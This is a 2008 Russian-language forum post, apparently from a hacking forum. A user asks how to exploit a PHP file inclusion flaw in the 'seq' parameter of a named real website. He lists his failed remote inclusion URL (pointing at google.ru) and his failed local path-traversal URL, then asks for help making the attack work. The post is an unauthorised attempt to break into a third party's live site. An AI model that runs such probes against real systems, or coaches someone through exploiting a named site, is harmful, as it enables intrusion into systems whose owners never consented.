Показать сообщение отдельно

  #924  
Старый 11.02.2008, 00:48
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
С нами: 9785147

Репутация: 137
По умолчанию

Извените за банальный тупой вопрос по пхп инклюдингу. прочол статью по этой теме на античате

вот нашол плохую фильтрацию
http://www.dosuga.net/index.php?type=pic&seq=dfdsfds&mk=on&num=4&tot=92
(уязвима переменная seq)

пробывал подставить в переменную сайт

http://www.dosuga.net/index.php?type=pic&seq=http://www.google.ru&mk=on&num=4&tot=92
ноль эмоций

пробывал разработать как локальный инклюд
http://www.dosuga.net/index.php?type=pic&seq=../index.php&mk=on&num=4&tot=92

тоже ничего
подскажите в чом я ошибся и как разрабатывать эту уязвимость?

Последний раз редактировалось ZET36; 11.02.2008 в 00:51..
 
Ответить с цитированием